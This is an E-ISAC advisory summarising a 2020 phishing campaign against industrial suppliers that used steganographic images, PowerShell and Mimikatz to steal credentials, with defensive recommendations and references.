Malware Targets Supply Chains of Japan, Italy, and Germany

Posting ID 125039
Date Added: 06/8/2020 3:33 PM EDT
Date Modified: 06/8/2020 4:35 PM EDT
E-ISAC Staff

Description

 

Summary:

 

In May of 2020, cyber security firm Kaspersky reported a form of malware allegedly targeting the supply chains of industrial organizations in the energy sector in Italy, the UK and Germany. 

 

Analysis:

 

Initial delivery is though a phishing email specifically catered to its target and contains a malicious MS Office document.  When a user interacts with the document, a script is triggered that downloads an image which contains the new malware hidden in the image. Using steganography to hide code in images is known attack technique because of its effectivesness; code imbedded in images is difficult for antivirus and other IDS devices to detect. The image file then executes a PowerShell script that eventually leverages Mimikatz to steal Windows credentials.

 

Impact:

 

Potential impacts from targeted malware of this nature can result in disclosure of legitimate network credentials to an adversary. Adversaries use these credentials to “live off the land” in a target’s environment in part because misuse of legitimate network credentials is difficult to detect.

 

 

MITRE ATT@CK Mapping:

 

 

Technique Identifier

Tactic

Technique Title

T1193

Spearphishing Attachment

Powershell/Mimikatz

 

What to Do:

 

A robust and ongoinig cyber security awareness program that includes training personnel on how to recognize and report phishing and suspicious emails can assist in stopping malicious emails from entering your envinronments. Additionally, evaluating and understanding the cyber security program at trusted suppliers is important in maintaining a relationship built on mutual trust.

 

 

 

 

 

References:

 

 

Kovacs, Eduard (2020).  Industrial Suppliers in Japan, Europe Targeted in Sophisticated Attacks.  Retrieved May 28, 2020. Retrieved from https://www.securityweek.com/industrial-suppliers-japan-europe-targeted-sophisticated-attacks?&web_view=true

 

 

https://www.virustotal.com/gui/file/cb9e7cae11788bb2cd3a41536ec072e89c0aa691d396a9d24b1d8ccc4418a638/details

 

 

Goodin, Dan.  (2020).  An advanced and unconventional hack is targeting industrial firms. May 30, 2020. Retrieved from https://arstechnica.com/information-technology/2020/05/an-advanced-and-unconventional-hack-is-targeting-industrial-firms/

 

 

Steganography in Targeted Attacks on Indutrial Enterprises.  Retrieved from https://ics-cert.kaspersky.com/reports/2020/05/28/steganography-in-targeted-attacks-on-industrial-enterprises/

 

 

Category Type:
Cyber Security
TLP - White
Shared Count (15)
  • Canadian CERTs
  • CRISP - Cyber Risk Info Sharing Program
  • DHS - NICC, NCCIC, US-CERT, etc
  • DNG-ISAC
  • DOE Complex
  • E-ISAC AOO Members
  • E-ISAC Staff
  • FBI, LE Fusion
  • FERC - OEIS, etc
  • FS-ISAC
  • International (other ISACs, CERTs)
  • MS-ISAC
  • Other (inc. local/state commissions)
  • Trade Organizations
  • Watch Floor
Change History
  • E-ISAC Staff, 06/08/2020